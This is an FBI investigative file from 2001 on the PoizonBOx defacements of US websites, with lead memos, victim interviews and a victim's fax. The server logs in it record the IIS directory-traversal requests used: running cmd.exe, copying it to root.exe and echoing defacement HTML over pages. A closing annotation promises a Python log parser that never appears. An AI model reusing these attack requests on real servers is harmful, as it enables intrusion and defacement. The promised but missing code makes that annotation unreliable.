FEDERAL BUREAU OF INVESTIGATION
(01/26/1998)

Precedence: ROUTINE    Date: 05/09/2001
To: Memphis    Attn: Squad 5, SSA [redacted]
From: Chicago
      Squad IP/C
      Contact: [redacted] 312/786-3918

Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted] (Pending)

Title: Subject: Hacker/Honker Union of China
       Victim: Illinois Secretary of State
       Type: Intrusion
       Date: 04/03/2001

Synopsis: To set lead for Memphis Division, Squad 5, SA [redacted].

Administrative: Reference telephone call between SA [redacted] and SA [redacted] on May 8, 2001.

Details: Chicago Division is the lead office for the criminal investigation of the Honkers Union of China, sometimes called the Hackers Union of China, specifically, actions against United States Web sites originating out of China.

Many of the attacks have taken the form of Web page defacements.

On May 8, 2001, SA [redacted] contacted SA [redacted] to inform that one of First Tennessee Bank's Web sites, www.ttcm.com, had been the victim of a Web site defacement. The statement on the Web site, "fuck USA Government fuck PoizonBOx contact: sysadmin@yahoo.com.cn", is a common statement seen on many of the defacements.

Other victims of this defacement have traced the IPs back to the People's Republic of China.

To: Memphis    From: Chicago
Re: [redacted] 08/08/2001

LEAD(s):
Set Lead 1:
MEMPHIS
AT MEMPHIS, TN

It is requested that SA [redacted] perform appropriate investigation, more specifically, obtain log files from the victim servers and provide FD-302s regarding the defacements and log files, and forward all information to SA [redacted].

(01/26/1998)

FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE    Date: 05/21/2001
To: Minneapolis    Attn: Squad 8, SSA [redacted]
From: Chicago
      Squad IP/C
      Contact: SA [redacted] 312/786-3918

Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted] (Pending)

Title: Subject: Hacker/Honker Union of China
       Victim: Illinois Secretary of State
       Type: Intrusion
       Date: 04/03/2001

Synopsis: To set leads for Minneapolis Division, Squad 8.

Details: Chicago Division is the lead office for the criminal investigation of the Honkers Union of China, sometimes called the Hackers Union of China, specifically, actions against United States Web sites originating out of China.

Many of the attacks have taken the form of Web page defacements.

On May 21, 2001, SA [redacted] was contacted by Minneapolis Division and informed that Squad 8 was receiving numerous complaints regarding Web site defacements possibly attributable to Chinese hackers. Many of the sites contained the following statement, "fuck USA Government fuck PoizonBOx contact: sysadmin@yahoo.com.cn", a common statement seen on many of the defacements reported by other divisions.

Other victims of this defacement have traced the IPs back to the People's Republic of China.

To: Minneapolis    From: Chicago

LEAD(s):
Set Lead 1:
MINNEAPOLIS
AT MINNEAPOLIS, MN

It is requested that Squad 8 perform appropriate investigation, more specifically, obtain log files from the victim servers and provide FD-302s regarding the defacements and log files, and forward all information to SA [redacted].
FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE    Date: 05/12/2001
To: Portland    Attn: NIPC Squad, [redacted]
From: Chicago
      Squad IP/C
      Contact: SA [redacted] 312/786-3918

Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted] (Pending)

Title: Subject: Hacker/Honker Union of China
       Victim: Illinois Secretary of State
       Type: Intrusion
       Date: 04/03/2001

Synopsis: To set leads for Portland Division, NIPC Squad, SA [redacted].

Administrative: Reference telephone call between SA [redacted] and SA [redacted] on May 3, 2001.

Details: Chicago Division is the lead office for the criminal investigation of the Honkers Union of China, sometimes called the Hackers Union of China, specifically, actions against United States Web sites originating out of China.

Many of the attacks have taken the form of Web page defacements.

On May 3, 2001, SA [redacted] contacted SA [redacted] to inform that Portland Division was receiving numerous complaints regarding Web site defacements possibly attributable to Chinese hackers. Many of the sites contained the following statement, "fuck USA Government fuck PoizonBOx contact: sysadmin@yahoo.com.cn", a common statement seen on many of the defacements reported by other divisions.

Other victims of this defacement have traced the IPs back to the People's Republic of China.

To: Portland    From: Chicago
Re: [redacted] 05/12/2001

LEAD(s):
Set Lead 1:
PORTLAND
AT PORTLAND, OR

It is requested that SA [redacted] perform appropriate investigation, more specifically, obtain log files from the victim servers and provide FD-302s regarding the defacements and log files, and forward all information to SA [redacted].

(Rev. 08-28-2000)

FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE    Date: 06/01/2001
To: Counterterrorism    Attn: NIPC, CIU, SSA [redacted]
    Chicago    Attn: SA [redacted]
From: Cleveland
      Squad 16
      Contact: SA [redacted] 216.622.6867

Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted] (Pending)

Title: Unsub(s);
       MicroSystems Management - Victim;
       The Townsend Group - Victim;
       Impairment - Web Page Defacement

Synopsis: Web page defacement in the Cleveland FO territory.

Enclosure(s): One [illegible] containing email messages and log files from [redacted].

Details: On 05/31/2001 [redacted] of MicroSystems Management, 2001 Crocker Road, Suite 460, Westlake, Ohio, 44145, telephone [redacted], a computer service consulting and management company, advised that one of his company's web pages had been defaced by a hacker on 05/30/2001. The normal contents of the web page were replaced with the words "fuck USA Government fuck PoizonBOx contact:sysadmcn@yahoo.com.cn".

[redacted] was able to recover from his server the logs of the attack against his machine from the directory /winnt/system32/logfiles/w3svc1 which he provided to writer via email (see enclosure). [redacted] stated that the attack came from Internet Protocol Address 210.77.147.216 which he believes resolves to a machine in the area of Toronto, Canada.

[redacted] also advised that a client of his company, [redacted] of The Townsend Group, has also suffered from the same attack. [redacted] said he would contact [redacted] and have him email the log of the attack to writer. Subsequently, writer received an email from [redacted] (see enclosure).

To: Counterterrorism    From: Cleveland
Re: [redacted] 06/01/2001

LEAD(s):
Set Lead 1: (Adm)
COUNTERTERRORISM
AT WASHINGTON, DC

Read and Clear.

Set Lead 2: (Adm)
CHICAGO
AT CHICAGO

This information is provided to Chicago for whatever investigative action is deemed appropriate.
(Rev. 08-28-2000)

FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE    Date: 05/25/2001
To: Counterterrorism    Attn: NIPC, [redacted], Room [redacted], SSA [redacted]
    Chicago    Attn: Squad IP/C, [redacted]
From: Milwaukee
      Squad 5
      Contact: SA [redacted] (414) 291-4254

Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted] (Pending)

Title: HACKER/HONKER UNION OF CHINA
       ILLINOIS SECRETARY OF STATE, et al
       COMPUTER INTRUSION
       04/03/2001

Synopsis: To provide information regarding computer intrusions that appeared to be perpetrated by the above-captioned subject.

Reference: [redacted]

Enclosure(s): Enclosed for Chicago are eight original FD-302s, and a copy of each, along with log records (enclosed in a "1A" envelope) documenting the hacks sustained by victims in the Milwaukee Division.

Details: Pursuant to notification by NIPC, Milwaukee contacted Chicago regarding the umbrella investigation that Chicago is conducting pertaining to the Honkers Union of China, the Lionworm, the Adoreworm, and other website hacks originating out of China. Milwaukee received the above referenced EC from Chicago, dated 05/12/2001, requesting that Milwaukee provide all pertinent log files and FD-302s to Chicago, with regard to the aforementioned investigation. At this time Milwaukee is providing the requested information to Chicago. [redacted] will be providing information on the attack sustained by Harley Davidson in a separate communication.

It is further noted that one of the FD-302s that Milwaukee is providing to Chicago is with regard to intrusions sustained by the Abbotsford School District beginning on 03/12/2001 and continuing thereafter. The attacks appeared to originate from Indonesian Internet Protocol (IP) Addresses, however Milwaukee believes that it is worth noting, due to the fact that the same method of intrusion (through IIS vulnerabilities and use of "cmd.exe") was utilized, and also due to the fact that during the "China-US Hacker War" the Indonesians supported the Chinese by joining them in the attacks of US websites. Therefore, the information provided by the Abbotsford School District is being included in the report to Chicago in the event that similar information has been developed by Chicago.

Milwaukee has referenced all of its victims in the "Descriptive Data" section of this communication which appears below.

Milwaukee considers this lead to be covered, however Milwaukee stands ready to assist Chicago with any additional leads. Milwaukee will also provide any outstanding log records to Chicago upon receipt of same from victims.

Descriptive Data:

Reference [redacted]
Name - Century Foods
Address(es) - 400 Century Court, P.O. Box 257, Sparta, WI
Phone # - [redacted]
Miscellaneous - POC: [redacted]

Reference [redacted] (re: St. Lawrence Seminary)
Name - SpiritUSA
Address(es) - 20 Forest Avenue, Fond du Lac, WI
Phone # - [redacted]
Miscellaneous - POC: [redacted]

Reference [redacted]
Name - Excel Communications
Address(es) - 185 North Jefferson Street, Milwaukee, WI
Phone # - [redacted]
Miscellaneous - POC: [redacted]

Reference [redacted] (re: EC Media Group)
Name - Jade Technologies
Address(es) - 16655 West Bluemound Road, Brookfield, WI
Phone # - [redacted]
Miscellaneous - POC: [redacted]

Reference [redacted]
Name - Gehl Company
Address(es) - 143 Water Street, P.O. Box 179, West Bend, WI 53095-0179
Phone # - [redacted]
Miscellaneous - Point of Contact: [redacted]

Reference [redacted]
Name - [redacted]
Address(es) - [redacted]
Phone # - unlisted
Miscellaneous - [redacted]

Reference [redacted]
Name - Saratoga Liquor Company
Address(es) - 3215 James Day Avenue, Superior, WI
Phone # - (715) 394-4487 ext. [redacted]
Miscellaneous - POC: [redacted]

Reference [redacted]
Name - Abbotsford School District
Address(es) - 307 North 4th Avenue, P.O. Box 70, Abbotsford, WI
Phone # - [redacted]
Miscellaneous - POC: [redacted]

To: Counterterrorism    From: Milwaukee
Re: [redacted] 05/25/2001

LEAD(s):
Set Lead 1:
COUNTERTERRORISM
AT WASHINGTON, DC

Read and clear.

Set Lead 2:
CHICAGO
AT CHICAGO, IL

The Chicago Division, as the Office of Origin, is being left with the discretion of setting forth any leads that might be generated from the information that Milwaukee has provided.
FD-302 (Rev. 10-6-95)

FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/30/2001

On 05/04/2001 [redacted] of CENTURY FOOD, 400 Century Court, P.O. Box 257, Sparta, Wisconsin, telephone [redacted], called the Milwaukee FBI Office to report that his website, www.centuryfoods.com or Internet Protocol (IP) Address 24.240.63.232, had been defaced. The site is used for informational purposes, and the responsible party appears to have utilized the IP address of 62.156.34.240 on 05/03/2001 at 8:30:53 AM Central Daylight Time (CDT), gaining access as "anonymous", followed by "guest@here.com". Then at 10:46:10 AM CDT on 05/03/2001, the IP Address of 193.159.77.87 was utilized in creating and sending files to CENTURY's system.

On 05/09/2001 [redacted] sent log records, supporting the intrusion, along with a diskette with same information on it, and a "screen shot" of the defaced default webpage showing the message of, "Beat down Imperialism of American!----for my great fatherland China and my fds there...----hacked by e4t7£i3h@H.U.C". [redacted] provided supporting documentation which reflected financial damages to be $1,512.35.

[redacted] provided log information from 05/08/2001, which reflected that another intrusion and website defacement had occurred on 05/08/2001 at 13:15:43 CDT from the IP Address of 203.231.161.6. At this time a "GET /scripts/../../winnt/system32/cmd.exe/c+dir" was run on the system and slight variations of that command thereafter allowed root to be obtained several command lines later. At that time a message was left on the website stating, "fuck USA Government fuck PoizonBOx contact :sysadmcn@yahoo.com.cn."

Investigation on 05/04/2001 at Milwaukee, WI (telephonically)

File # [redacted]    Date dictated 05/25/2001

by [redacted]

This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; it and its contents are not to be distributed outside your agency.
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/30/2001

On 05/07/2001 [redacted] of SPIRITUSA, an Internet Service Provider and website host service, 20 Forest Avenue, Fond du Lac, Wisconsin 54935, telephone [redacted], called the Milwaukee Office of the FBI to report that one of his customers, ST. LAWRENCE SEMINARY of Mount Calvary, Wisconsin, had been hacked by PoizonBOx. Specifically, the mail server was affected in that people could not sign on to receive mail after the website was altered on 05/05/2001. ST. LAWRENCE SEMINARY did not maintain log records, but they were able to determine, through review of the summary.htm and index.htm files, that the image was created at 11:33 AM. [redacted] provided a screen shot of the altered webpage, which was provided to him by ST. LAWRENCE SEMINARY. This particular screen shot is difficult to read because of the black background, however it was noted that the last line reads "contact:sysadmen@yahoo.com.cn". Financial damages were reported to be minimal.

Investigation on 05/07/2001 at Milwaukee, WI (telephonically)

File # [redacted]    Date dictated 05/25/2001

by [redacted]
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/30/2001

On 05/07/2001 [redacted] of EXCEL COMMUNICATIONS, 185 North Jefferson Street, Milwaukee, WI 53202, telephone [redacted], reported that his company had sustained an attack on their default website with an IP Address of 168.215.58.196. The message on their site was replaced with a black background and red lettering stating "fuck USA Government fuck PoizonBOx contact: sysadmen@yahoo.com.cn." This attack came through IIS and affected their mail server (209.100.161.2). [redacted] advised that they do not use their default site and that their orders were not affected.

[redacted] provided the IP Addresses that had engaged in this suspicious activity as 131.91.81.31 on 05/03/2001 (no time was provided); 210.170.24.80 on 05/06/2001 (no time provided); 210.230.128.198 on 05/06/2001 (no time provided); 203.175.128.10 on 05/06/2001 (no time provided). [redacted] attempted to send his log files electronically, over the Internet, to an FBI e-mail account, however he [illegible] that it was not properly received by FBI Milwaukee. [redacted] advised that a diskette and print out of the log records, along with documentation of damages would be forthcoming. However, to date, this information has not yet been received.

Investigation on 05/07/2001 at Milwaukee, WI (telephonically)

File # [redacted]    Date dictated 05/25/2001
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/30/2001

On 05/08/2001 [redacted] of JADE TECHNOLOGIES, an Internet Service Provider (ISP) and web hosting service, 16655 West Bluemound Road, Suite 230, Brookfield, Wisconsin 53005, telephone [redacted], called to report that his customer, EC MEDIA GROUP, sustained a website defacement on one of their internal sites, "http://outlook.dmreview.com/", which is used to access mail. Three to four files were replaced, which replicated itself in 15 different places, and occurred twice. A derogatory message was left on the website stating "fuck USA Government fuck PoizonBOx contact: sysadmen@yahoo.com.cn." [redacted] indicated that the customer could not provide log records because their security audit was not turned on. They were only able to provide a snapshot of their defaced screen, which they quickly replaced. Financial damages were said to be minimal.

Investigation on 05/08/2001 at Milwaukee, WI (telephonically)

File # [redacted]    Date dictated 05/25/2001
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/30/2001

On 05/10/2001 [redacted] for the GEHL COMPANY, 143 Water Street, P.O. Box 179, West Bend, WI 53095-0179, telephone [redacted], called to report that a company owned by GEHL, known as "COMPACT EQUIPMENT ATTACHMENTS", was attacked at their web address of www.ceattach.com on two separate occasions. The first attack occurred on 04/29/2001 when their default "Under Construction" page was replaced with the PoizonBOx message. Upon discovery of same, the server (156.46.155.174) was formatted and reloaded with the company's code. This attack cost his company about $6,000.00, which includes internal personnel and outside consulting fees. After the incident a small server that contained no code and had only the "Under Construction" message on it, was placed on the Internet. This site was attacked again on 05/10/2001 and the "Under Construction" page was again replaced with the PoizonBOx message.

On 05/11/2001 [redacted] mailed a package that contained a diskette and print out of the pertinent log records for the aforementioned dates, along with a letter that provided the financial damages. He noted that the responsible IP Address for the 04/29/2001 attack was 202.104.57.245, which was registered to GUANG DONG RESEARCH CENTER in China and the IP address responsible for the attack on 05/10/2001 was 202.64.252.67, which is registered to a company, PROGRAM PLANNING PROFESSIONALS LIMITED in Hong Kong. The method utilized in the intrusion appeared to be through IIS, using the "cmd.exe" and then copying scripts to "root.exe."

Investigation on 05/10/2001 at Milwaukee, WI (telephonically)
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/30/2001

On 05/14/2001 [redacted] reported that [redacted] was defaced. The website was replaced with a black background and red lettering. It contained ten pictures, which included pictures of WONG WEI (the Chinese pilot killed in the collision with the US EP-3) and voiced human rights concerns, with fireworks exploding in the background. [redacted] thought that the sites had been taken down by his host, DATAWAVE TECH in Wausau, 330 Third Street, Wausau, WI 54403, telephone (715) 843-7823. [redacted] checked the website the other day, to see if it was still up, and found the defaced site. [redacted] did not know the date of occurrence, nor did he have supporting log records on same. [redacted] did not sustain monetary loss from this defacement, but thought that he should report the matter to the FBI.

Investigation on 05/14/2001 at Milwaukee, WI (telephonically)

File # [redacted]    Date dictated 05/25/2001
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/30/2001

On 05/23/2001 [redacted] of the SARATOGA LIQUOR COMPANY, 3215 James Day Avenue, Superior, Wisconsin 54880, telephone (715) 394-4487, ext. [redacted], called to report that his company's website had been defaced, but that no serious damage was done. The website was replaced with a black background and a message in red lettering, stating "fuck the USA Government fuck PoizonBOx contact: sysadmen@yahoo.com.cn." [redacted] was not certain when the attack occurred, but he recalled checking the server on 05/01/2001 and it was fine. He checked it again on 05/21/2001, and that is when he noticed that something was wrong. [redacted] was anxious to patch his system and restore the original website, so he did not save a screen shot of the website, nor did he have log records to provide on same. Financial damages were noted as being minimal.

Investigation on 05/23/2001 at Milwaukee, WI (telephonically)

File # [redacted]    Date dictated 05/25/2001

by [redacted]
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/30/2001

On 04/25/2001 [redacted] of the ABBOTSFORD SCHOOL DISTRICT, 307 North 4th Avenue, Abbotsford, WI 54405, telephone (715) 223-2386 ext. [redacted], called to complain that she had noticed on 03/12/2001 that they had fallen under attack. Specifically the hacker attempted to replace the default page for the ABBOTSFORD SCHOOL DISTRICT, however the attempt failed. The responsible individual intended to take credit for the attack and the website was supposed to be rerouted to a GEOCITIES ftp server. The hack [remainder of sentence illegible]. [redacted] noticed subsequent hacks on 03/26/01 stating "[redacted] was here." Additional hacks were also sustained on 03/29/2001; 04/07/2001 and 04/08/2001 by [redacted]. Also on 04/07/2001 a message was left stating "DEDI JANGAN BELAJAR SNIFING.NTAR PINGSAN KAUW." An attempt was also made to steal their password files on 04/07/2001.

The ABBOTSFORD SCHOOL DISTRICT does not have a firewall, but will soon be installing one. [redacted] is still working on trying to get the "bugs" fixed and the hackers out of her system. The school district had hired some consultants from DIRK'S CONSULTING GROUP and is expecting to incur some financial costs from same. [redacted] provided partial logs, via facsimile, as a sample of the trouble that the ABBOTSFORD SCHOOL DISTRICT had encountered. She advised that she would forward the detailed logs along with financial damages, upon compilation of same.

Investigation on 04/25/2001 at Milwaukee, WI (telephonically)

File # [redacted]    Date dictated 05/25/2001
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 6/1/01

[redacted], Information Security Services, and [redacted], Vice President, Computer Forensics Investigations, Charles Schwab & Co. Inc, 101 Montgomery [illegible]-3-613, San Francisco, CA 94104, telephone [redacted], were contacted at the Charles Schwab offices at 6200 Stoneridge Mall Drive, Pleasanton, CA by FBI Special Agents [redacted] and [redacted]. They were advised of the identity of the agents and the purpose of the interview. [redacted] and [redacted] provided the following information:

The Retirement Planning Systems Data Center (RPSDC) is located in Akron, Ohio. The purpose of this system is to serve Charles Schwab customers in planning for their retirement. Also known as Schwabplan, it is a public site that is accessible from the Internet. The RPSDC was running an unpatched version of Windows NT IIS 4.0.

On May 3rd, 2001 at 1:30 pm EST a customer called the Help Desk to advise that the Schwabplan webpage had been defaced. A screen print of the defaced page is attached to and made a part of this document. It is a black screen with the following words written on it:

fuck USA Government
fuck PoizonBOx
contact :sysadmcn@yahoo.com.cn

The website was down for approximately four hours. The labor cost to repair this site is a couple hundred thousand dollars. The repairs required eleven people to work approximately 48 hours. A more accurate figure is being calculated that will include lost business costs.

A printout of the logs was provided by Charles Schwab and is attached to and made a part of this document. A CD containing the weblogs was made by, signed and dated [redacted]. The CD is contained in a 1A envelope.

Investigation on 5/31/01 at Pleasanton, CA

by [redacted]
Attachment: excerpt of the Schwabplan IIS log w05_ex010503.log (the scan split the four columns, file:time, client address, request and status, apart; they are rejoined here). Every request between 20:16:28 and 20:17:00 came from 194.206.83.113 and followed a single pattern: runs of

GET /scripts/root.exe 502

interleaved with

GET /scripts/../../winnt/system32/cmd.exe

(one 200 appears among the otherwise uniform 502 status values), and the excerpt ends with

GET /index.asp 200


(Rev. 08-28-2000)

FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE    Date: 06/04/2001
To: Chicago    Attn: SA [redacted]
From: San Francisco
      Squad 14B
      Contact: [redacted] (510) 583-5245

Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted]

Title: Hacker/Honker Union of China;
       Illinois Secretary of State - victim;
       Intrusion;
       4/3/01

Synopsis: To provide results of lead to Chicago.

Reference: [redacted]

Enclosures: One original and two copies of FD-302 dated 6/1/01; envelope containing original notes of interview and a CD of weblogs for affected system.

Details: [redacted] provided details of defacement of Schwabplan Retirement website.

San Francisco considers this lead closed.


Complaint Form
FD-71 (Rev. 3-27-98)

NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below

Subject's name and aliases: UNSUB
Character of case: [handwritten, illegible]
Complainant: [redacted]   [ ] Protect Source
Complaint received: [ ] Personal [X] Telephonic   Date 5/21/01   Time [illegible]
Address of Subject:
Complainant's address and telephone number: [redacted]
Scars, marks, and other data:
Complainant's DOB:
Employer / Address / Telephone:
Vehicle Description:

Facts of complaint (handwritten, partly illegible): The [...] web site (complainant's) was entered [...], possibly Chinese, and the [...] message was introduced. Said event occurred [...] May [...], 2001.

Do not write in this space.
BLOCK STAMP
Page 1 of 1

[Attached printout of the defaced page:]

fuck USA Government
fuck PoizonBOx

contact:sysadmcn@yahoo.com.cn

http://msn.com/ 5/21/01

[handwritten annotation, illegible]


Complaint Form
FD-71 (Rev. 3-27-95)

NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below

Subject's name and aliases:
Complaint received: [ ] Personal [X] Telephonic   Date [illegible]/01   Time [illegible]
Address of Subject:
Complainant's address and telephone number: [handwritten, partly illegible; reads "Subway ..."]
Scars, marks, and other data:
Employer:
Vehicle Description:

Facts of complaint (handwritten, partly illegible): [Complainant], Internet analyst at Subway [...], advised that web server was accessed without permission and said [...] messages of "Fuck USA Government" and "Fuck PoizonBOx" were [...] at IP 207.160.[illegible] with additional message of "contact sysadmcn@yahoo.com.cn". [...] tracked [...] sender of the message to IP [illegible] [...]. [Complainant] was advised [...] complaint [...].

Address / Telephone:

Do not write in this space.
BLOCK STAMP

FD-302 (Rev. 10-6-95)

-1-
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/8/2001

[redacted], Americares, 161 Cherry Street, New Canaan, Connecticut, was advised of the identity of the interviewing agent and the nature of the interview. [redacted] provided the following information.

Americares website is americares.org and was defaced.

[redacted] e-mailed the logs regarding the defacement to SA [redacted]. The logs are on a CD-R in the attached FD-340 1A envelope.

Investigation on 5/8/2001 at New Haven, Connecticut

File # [redacted]   Date dictated 5/8/2001

This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; it and its contents are not to be distributed outside your agency.

b6
b7C

b3
b6
b7C
b7E


FD-302 (Rev. 10-6-95)

FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/27/2001

[redacted], date of birth [redacted], Greenfield Consulting Group, 274 Riverside Avenue, Westport, Connecticut, 203-221-0411, contacted the Federal Bureau of Investigation and furnished the following information.

Their web servers were attacked twice. The first attack went unnoticed until the defacement. They found the first incident while reviewing logs after the second attack. During the second attack files on their web page were replaced.

[redacted] furnished a facsimile containing information as to their system and the attack. On May 21, 2001, in response to a request by SA [redacted], he furnished a CD-R containing the logs and altered files.

Attached is a copy of the facsimile.

Investigation on (telephonically)

File # [redacted]   Date dictated 05-27-01

This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; it and its contents are not to be distributed outside your agency.

b6
b7C

b3
b6
b7C
b7E


[Fax transmission result report, printed rotated on the page. Legible fields: DATE: MAY 2001; TEL: 1 203 221 0791; NAME: [illegible]. Labels DESTINATION STATION, SESSION FUNCTION and TX RESULT REPORT are present but their values are not legible.]


Greenfield Consulting Group
274 Riverside Ave · Westport, CT 06880 · Fax (203) 221-0791

Fax

To: FBI Complaint Duty Agent          From: [redacted]
Fax: (203) 503-5098                    Pages: 13 (including Cover Page)
Phone: (203) 777-6311                  Date: 05/08/01
Re: Network Computer Attack            Phone: (203) 429-0280

Urgent / For Review / Please Comment / Please Reply / Please Recycle

Comments:
I was advised to fax this information in so that it can be given to the appropriate people.
The following people at our office are handling this situation:

[redacted]

Greenfield Consulting Group
274 Riverside Avenue
Westport, CT 06880
Switchboard: (203) 221-0411
Fax: (203) 221-0791

If there is a problem with the fax or if you need more information, please contact us.

Thank you for your help in these matters.

WARNING: THE SUBSEQUENT PAGES CONTAIN PROFANE LANGUAGE


b6 
b7c¢ 


b6 
b7C 



May 8, 2001 


To Whom It May Concern: 


The purpose of this correspondence is to provide information to you in regards to 
unauthorized malicious access to our network. Our apologies for the explicit content. 


Our email server is running NT4.0 Service Pack 5, Exchange Server 5.5, and IIS4.0 for 
Outlook Web Access. 


The email server was attacked on two occasions. The first attack modified files that are 
never accessed, so we did not notice it. We found this attack by browsing log files after 
the second attack took place. The second attack modified all the index.asp, index.htm, 
default.asp, and default.htm files on all of our root web directories for each virtual site. 
This attack we definitely noticed. Originally, these default index pages were set to allow 
our users access to their email from any computer that can access the internet. These 
changes disabled this ability for almost 24 hours. 


Attached are copies of log file excerpts as well as IP Whois lookup information from the 
UXN Spam Combat website tools. Their site is at http://combat.uxn.com. Also attached 
is a copy of what the “index” files were changed to. 


The first attack came from an IP that belongs to a University in Mexico. The second
attack came from an IP that belongs to a Cable TV station in Japan. Email addresses are
included on the Whois lookup information, but we have not contacted anyone outside our
organization except for the FBI.

Launching a browser to http://210.253.184.2 will take you to the TV station's website. If
you go to http://210.253.184.3, you will get a default page from an Apache web server
running on a UNIX/Linux box. This is the same IP address as contained in our logs.


Both attackers changed the website pages to contain the exact same message. 


Thank you in advance for any help you can give us in dealing with this problem. 


Sincerely,


b6 
b7Cc 


WHOIS information on IP numbers                                            Page 1 of 1
IP whois of 200.53.234.124

ipw: Connecting to server: whois.arin.net:43
ipw: Query: net 200.53.234.124
ipw: Connecting to server: whois.arin.net:43
ipw: Query: !NETBLK-UABJO-RED-1
Universidad Autonoma Benito Juarez de Oaxaca (NETBLK-UABJO-RED-1)
   Ex-Hacienda 5 Señores C.U. Edificio de Rectoria
   Oaxaca, Oaxaca 68120
   MX

   Netname: UABJO-RED-1
   Netblock: 200.53.224.0 - 200.53.239.255

   Coordinator:
      Mendez, Benjamin (BM722-ARIN) uabjo@siu.cen.buap.mx
      +52 951-65843

   Record last updated on 12-Apr-2000.
   Database last updated on 7-May-2001 22:52:06 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

May 3, 2001 21:00 GMT, whois.arin.net is very slow

[handwritten annotation, illegible]

http://erik.selwerd.nl/ipw.cgi?time=20&ip=200.53.234.124                    05/08/01


[IIS 4.0 log excerpt in the Microsoft IIS log format: client IP, user, date, time, service, server name, server IP, time taken (ms), bytes received, bytes sent, HTTP status, Win32 status, method, URI stem, URI query. Carets (^) are cmd.exe escape characters. Every root.exe request carries the same echo payload; it is written out in full once below and abbreviated as [defacement HTML as above] thereafter.]

200.53.234.124, -, 5/6/01, 18:29:28, W3SVC1, GCGPO1, 192.168.1.13, 391, 66, 505, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
200.53.234.124, -, 5/6/01, 18:29:39, W3SVC1, GCGPO1, 192.168.1.13, 15, 70, 796, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+..\,
200.53.234.124, -, 5/6/01, 18:29:39, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
200.53.234.124, -, 5/6/01, 18:30:12, W3SVC1, GCGPO1, 192.168.1.13, 62, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././index.asp,
200.53.234.124, -, 5/6/01, 18:30:12, W3SVC1, GCGPO1, 192.168.1.13, 31, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>.././index.htm,
200.53.234.124, -, 5/6/01, 18:30:23, W3SVC1, GCGPO1, 192.168.1.13, 15, 425, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>.././default.asp,
200.53.234.124, -, 5/6/01, 18:30:23, W3SVC1, GCGPO1, 192.168.1.13, 16, 425, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>.././default.htm,
200.53.234.124, -, 5/6/01, 18:30:23, W3SVC1, GCGPO1, 192.168.1.13, 63, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
200.53.234.124, -, 5/6/01, 18:30:28, W3SVC1, GCGPO1, 192.168.1.13, 63, 424, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../../index.asp,
200.53.234.124, -, 5/6/01, 18:30:38, W3SVC1, GCGPO1, 192.168.1.13, 15, 424, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../../index.htm,
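The two log excerpts in this fax (5/6/01 from 200.53.234.124 and 5/7/01 from 210.253.184.3) record the same three-step sequence: a directory-traversal request that runs /winnt/system32/cmd.exe through the /scripts virtual directory, a copy of cmd.exe into /scripts as root.exe so it can be requested directly, and a run of root.exe requests that echo the defacement HTML over every index.asp, index.htm, default.asp and default.htm reachable by relative path. The Python below is an added example, not part of the FBI file or of the victim's material: it parses lines in the IIS 4.0 Microsoft log format used in the fax, decodes the query the way cmd.exe received it (%xx sequences and '+' as space, '^' as the escape character), classifies each request as one of those steps, and reports the defaced paths and the message text per client IP. The sample lines are constructed to mirror the excerpts (198.51.100.7 is a documentation address standing in for an ordinary visitor), and the function and field names are the example's own. Two caveats for anyone reviewing such logs: IIS answers 502 when the "CGI" it launched (here cmd.exe) returns no HTTP headers, so the 502s in these excerpts do not mean the commands failed; and the URI stem is logged after decoding, so the log cannot show which encoding of the traversal the attacker actually sent. A host-log rule can match the decoded stem, as this one does, but a network-level rule would need the encoded forms.

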